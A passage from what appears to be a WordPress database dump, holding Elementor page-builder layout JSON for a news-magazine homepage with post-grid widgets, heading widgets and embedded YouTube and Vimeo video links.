color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1406,488,'_elementor_version','0.4'),(1407,488,'_elementor_css','a:3:{s:4:\"time\";i:1508919742;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1409,360,'_oembed_6a6f6dd05214efc3963efb0d318a45b5','{{unknown}}'),(1410,489,'_elementor_edit_mode','builder'),(1411,489,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\